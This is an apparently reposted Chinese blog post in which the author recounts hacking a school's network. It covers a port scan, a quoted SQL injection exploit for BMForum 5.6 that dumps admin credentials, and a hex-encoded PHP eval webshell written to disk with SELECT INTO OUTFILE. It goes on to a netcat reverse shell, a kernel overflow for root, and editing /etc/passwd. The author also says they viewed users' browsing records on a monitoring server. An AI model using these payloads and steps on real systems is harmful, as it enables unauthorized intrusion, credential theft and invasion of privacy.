前奏：無意間拿下了學(xué)校一臺檢測網(wǎng)絡(luò)訪問的服務(wù)器，無意間看到一個遠(yuǎn)程登錄的信息，遂對此網(wǎng)段掃描了一下80端口。。。

上個J8，就是那個上網(wǎng)檢測東西。。



其實記錄的很詳細(xì)，沒有加密的聊天內(nèi)容都可以看到。我還是比較尊重他人隱私的，所以只查看了一些上網(wǎng)行為。

剛才說了，掃了一下那個網(wǎng)段的80端口，有一個開著，就點進去看了一下，是BMForum20075.6的論壇，php的。

老系統(tǒng)了，記得前幾年爆了個注入，也不知道是不是這個版本，上db-exploit看了一下，艸，中槍了。



————————-下面的來自db-exploit————————

BMForum5.6(tagname)RemoteSQLInjectionVulnerability

Author:~!Dok_tOR!~
Datefound:30.09.08
Product:BMForum
Version:5.6
URL:www.bmforum.com
VulnerabilityClass:SQLInjection
Condition:magic_quotes_gpc=Off

Exploit:

http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1′+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*

#milw0rm.com[2008-10-01]



于是乎….



不用猜你就懂了，密碼是admin。

進后臺了，這個模式我不是很喜歡，翻了半天沒找到能上傳的地方。上J8。



不過，還是好好找，依然能找到可以利用的東西，發(fā)現(xiàn)了這個后臺有phpinfo()和SQL執(zhí)行。

看了一下，是root權(quán)限，也得到了web目錄，如果沒開啟魔術(shù)引號，可以考慮intooutfile。

補一句：mysql的root權(quán)限在linux下一般沒什么用，有寫權(quán)限就不錯了，如果是windows系統(tǒng)，可以考慮導(dǎo)出udf.dll。





管理員百密一疏啊，沒開魔術(shù)引號~~蛤蛤，大快人心?。

直接select一句話木馬，然后導(dǎo)出到文件~~

下面那一段十六進制字符串是www.jb51.net<?phpeval($_REQUEST[fuck]);?> 的hex值

select0x3C3F706870206576616C28245F524551554553545B6675636B5D293B3F3Eintooutfile‘/usr/local/bmf/bmb/datafile/x.php’



然后成功得到shell。如圖。



接下來，試試菜刀里能不能執(zhí)行命令，下面就要考慮提權(quán)了。

試了一下，看似可以執(zhí)行命令，也得到了一些服務(wù)器信息。



2.6.9-22的內(nèi)核，有溢出。

這個終端有個毛病，就是不能即時回顯，畢竟是通過webshell虛擬的終端，所以，還需要nc來反彈一個shell，用于溢出。

這個服務(wù)器上已經(jīng)裝了nc，可是是閹割過的，不能指向bash，所以，下載源碼，編譯。

用wget在sourceforge.net上下載，就不多說了。。

編譯什么的，也是soeasy。實在不行就百度一個i386架構(gòu)下編譯的linux版netcat。

下面的工作就是要反彈shell了，一臺外網(wǎng)的機子是必須的，就算不是外網(wǎng)，能映射也行。

剛好手頭有個映射過端口的服務(wù)器，如果是外網(wǎng)服務(wù)器，就更簡單了，詳見netcat使用幫助。

http://wenku.baidu.com/view/f77334ee19e8b8f67c1cb9fe.html

好了，開始反彈吧。。。





很好，反彈成功，已經(jīng)可以執(zhí)行一些低權(quán)限的命令的。

接著提權(quán)吧。上傳了一個叫做“x”的程序，用于溢出。



蛤蛤，溢出成功了，已經(jīng)是root權(quán)限了，下面加用戶什么的就不說了，你懂的~~

嘮叨一句，變身成root的方法。。。修改/etc/passwd



這是我用pietty連接ssh之后，查看passwd，已經(jīng)改成root了


作者sunrise@luzix.com from：情'blog

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。